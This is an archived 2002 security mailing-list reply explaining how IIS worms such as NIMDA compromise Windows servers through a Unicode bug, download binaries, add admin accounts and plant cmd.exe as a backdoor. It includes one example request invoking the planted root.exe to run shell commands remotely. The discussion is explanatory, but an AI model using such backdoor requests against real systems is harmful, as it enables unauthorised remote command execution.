OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jens Benecke (mail-020506jensbenecke.de)
Date: Mon May 06 2002 - 15:20:52 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi,

    your mail client seems to quote improperly (see below). Perhaps you'll
    want to fix this.

    On Sat, May 04, 2002 at 10:11:56AM -0700, H C wrote:

    > > If you look at defaced.alldas.org, sorted by OS, you will see that
    > > about 60% of all cracked web sites are IIS / Microsoft machines,
    > > while (according to Netcraft) IIS only makes up about 25% of the
    > > whole web server market.
    > Thanks for the response, but that really doesn't answer my question.
    > While Alldas.org does show defaced web pages, it doesn't show how the
    > pages were defaced. Therefore, there's no way of knowing if it was a
    > Unicode exploit, or if someone did something as I mentioned in my
    > original post.

    Well... in all the cases that I have seen so far, Windows boxes are
    running IIS with administrator rights (can you run it as a normal user
    at all? Can it drop privileges after binding to port 80, Like Apache?),
    and once you control that process, you are effectively root.
     
    > > Does one of the numerous IIS viruses (NIMDA, CodeRed, Codeblue, etc)
    > > count?
    > No. My original question was about NT/2K systems that had been broken
    > into and taken over in a manner similar to how Linux boxes are
    > 'rooted'. Since none of the worms you mention do this (break in,
    > install backdoors/rootkit(s), modify system binaries, etc) the answer
    > would be no.

    But they do. NIMDA and several others expoit a unicode bug in IIS, use
    the bug to download several binaries from another IP (e.g. a custom TFTP
    server), create a guest account with administrator privileges, copy
    cmd.exe into the web root, and put all downloaded files there as well so
    the next attacked box can be served as well.

    When you do "GET http://cracked-box/scripts/root.exe?/c+dir+C:\\", you
    are effectively root, you can shutdown the machine remotely with a
    rundll32.exe call, you can do everything you can do with the shell
    (which, admittedly, isn't much, as much as you can do on e.g. Linux or
    BSD, but it's enough to do damage).

    Some of the variants also destroy logs and replace IIS binaries. I
    think this qualifies as 'being rooted'. 

    -- 
mfg, Jens Benecke  /// www.hitchhikers.de, www.linuxfaq.de, www.linux.ms
This mail is an attachment? Read http://www.jensbenecke.de/misc/outlook.html

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Weitere Infos: siehe http://www.gnupg.org

    iD8DBQE81uWk153rQBa8U44RAoXnAJ9GBA8klyQTFIatMY7q2F+neSb/igCcDWMX Cw++xE9J7F4ppyOf86VVTrA= =5Z/6 -----END PGP SIGNATURE-----